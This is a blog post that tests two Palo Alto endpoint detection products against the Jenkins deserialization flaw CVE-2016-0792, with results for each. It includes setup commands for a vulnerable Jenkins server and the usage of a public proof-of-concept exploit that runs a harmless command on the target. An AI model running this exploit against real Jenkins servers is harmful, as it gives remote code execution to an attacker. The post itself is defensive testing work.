Testing Endpoint Detection Response Products
This is the first of many posts on how to test your Endpoint Detection Response product by using real world scenarios.
Products that are being tested
I am testing two products today:
- Palo Alto Prisma Cloud Host Defender (Twistlock’s Endpoint Detection Response product)
- Palto Alto XDR Agent for Linux
Jenkins Exploit Information (CVE-2016-0792)
CVE-2016-0792 refers to a vulnerability in Jenkins (continuous integration tool) before versions 1.650 and LTS before 1.642.2 and allows remote authenticated users to execute arbitrary code via serialized data in an XML file, related to XStream and groovy.util.Expando.
Setting up your Environment
I will be covering a two machine scenario (victim and attacker). The victim machine will have the vulnerable version of Jenkins and the attacker machine will be running the exploit.
Victim Machine Setup
I chose to use an Amazon Web Services EC2 instance type t2.medium and Ubuntu 18.04 LTS (ami-0e472ba40eb589f49).
# Environment Setup for CVE-2016-0792
#
# Multiple unspecified API endpoints in Jenkins
# before 1.650 and LTS before 1.642.2 allow remote authenticated users to
# execute arbitrary code via serialized data in an XML file,
# related to XStream and groovy.util.Expando.
#
# O/S: Ubuntu 18.04
# Jenkins Version 1.609.3
# Known Exploit
# From Host (vulnerable machine)
#
# Prerequisite packages
# Download Java 7 JDK
curl -L -O -k https://files-cdn.liferay.com/mirrors/download.oracle.com/otn-pub/java/jdk/7u80-b15/jdk-7u80-linux-x64.rpm
# convert rpm to deb
apt-get install alien netcat developer-tools
sudo alien --scripts jdk-7u80-linux-x64.rpm
# install java 7 deb
dpkg -i jdk_1.7.080-1_amd64.deb
# Create Jenkins User
useradd jenkins
mkdir /home/jenkins
mkdir /opt/jenkins
chown -R jenkins:jenkins /home/jenkins
mkhomedir_helper jenkins
# Download and run Jenkins
cd /opt/jenkins
curl -L -k -O https://get.jenkins.io/war-stable/1.609.3/jenkins.war
java -jar jenkins.war
Code language: PHP (php)
Attacker Machine
I am using MacOS Montery but any machine with Python3 will work
Download Exploit
The proof of concept code was found on github and was written by jpiechowka.
pip3 install requests
git clone https://github.com/jpiechowka/jenkins-cve-2016-0792
cd jenkins-cve-2016-0792
Code language: PHP (php)
Use Exploit
You will need to replace <serverip> with the IP address of server you are trying to exploit
This example touches a file located at /tmp/file_write. The exploit proof of concept code has an issue with special characters so my example will not use them. The command below (touch) works fine and proves that we have code execution.
python3
from exploit import exploit
exploit('http://<serverip>:8080/', '/usr/bin/touch /tmp/file_write')
Code language: JavaScript (javascript)
Endpoint Detection
Configuration
Each product tested was configured with the highest possible settings for detection.
Response Testings Results
Prisma Cloud Host Defender
Did not detect or alert
Palo Alto XDR Linux Host Agent
Detected a “Suspicious Input Deserialization” event